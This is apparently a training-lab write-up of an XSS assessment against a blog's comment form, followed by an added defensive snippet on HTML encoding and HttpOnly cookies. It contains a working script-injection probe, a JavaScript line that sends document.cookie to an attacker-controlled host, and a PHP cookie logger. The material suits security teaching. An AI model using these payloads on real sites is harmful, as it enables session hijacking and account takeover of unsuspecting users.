XSS Assessment

We are performing a Web Application Penetration Test for a company that hired us and has just released its new Security Blog. In our Web Application Penetration Testing plan, we have reached the part where we must test the web application against Cross-Site Scripting (XSS) vulnerabilities.

Start the server below, make sure you are connected to the VPN, and access the /assessment directory on the server using the browser.

Apply the skills you learned in this module to achieve the following:

  1. Identify a user-input field that is vulnerable to an XSS vulnerability

  2. Find a working XSS payload that executes JavaScript code on the target's browser

  3. Using the Session Hijacking techniques, try to steal the victim's cookies, which should contain the flag

Finding XSS Vulnerable Input Field

Navigating through the website, there is a section to leave a comment. Try the following script (modified to contain the name of the field) in each of the input fields:

First start a PHP HTTP server with:

sudo php -S 0.0.0.0:80

Test the XSS script below to see which field calls back to our HTTP server:

"><script src=http://10.10.14.7></script>

We see it is the website input field that is vulnerable.

Exploiting the Vulnerability

We will create a script called script.js hosted on our VM with the following payload:

new Image().src='http://OUR_IP/index.php?c='+document.cookie;

We will also create a PHP script called index.php, which script.js calls when it executes, to record the cookie of the user's session:

<?php
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>

Next, we start our PHP web server and then inject the call to script.js in the vulnerable web input field.

We can see the requests come in along with the flag, and the file that was created to record the details.
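As an added example, not part of the original writeup: the probe above works because the comment field's value is placed inside an HTML attribute without encoding, so `">` closes the attribute and the tag, and the cookie theft works because the session cookie can be read by document.cookie, which only happens when it lacks the HttpOnly flag. The Node.js snippet below (hypothetical names renderVulnerable, renderSafe and cookieIsHijackable; the Set-Cookie values are constructed) contrasts the vulnerable rendering with an encoded one and checks a Set-Cookie header for the flag that would have blocked the theft.

```javascript
// Added example: models the two conditions the writeup relies on.
// Function names are hypothetical; they are not the target's code.

// Constructed input: the probe payload used in the writeup.
const PROBE = '"><script src=http://10.10.14.7></script>';

// Vulnerable pattern: the submitted value is concatenated straight into
// the value="" attribute, so '">' ends the attribute and the <input> tag.
function renderVulnerable(fieldName, value) {
  return `<input type="text" name="${fieldName}" value="${value}">`;
}

// Encode the five characters that matter in HTML text and attribute
// context; the payload then stays an inert string inside the attribute.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

function renderSafe(fieldName, value) {
  return `<input type="text" name="${escapeHtml(fieldName)}" value="${escapeHtml(value)}">`;
}

// Count <script tags that the browser would parse as real tags
// (encoded '&lt;script' does not match).
function scriptTagCount(html) {
  return (html.match(/<script\b/gi) || []).length;
}

// document.cookie can only expose a cookie that lacks HttpOnly; this
// checks a Set-Cookie header value for that flag.
function cookieIsHijackable(setCookieHeader) {
  return !/;\s*HttpOnly\b/i.test(setCookieHeader);
}

console.log(renderVulnerable('website', PROBE)); // attribute closed, script tag is live
console.log(renderSafe('website', PROBE));       // payload encoded, still one <input>
console.log(cookieIsHijackable('session=abc123; Path=/'));           // true
console.log(cookieIsHijackable('session=abc123; Path=/; HttpOnly')); // false
```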
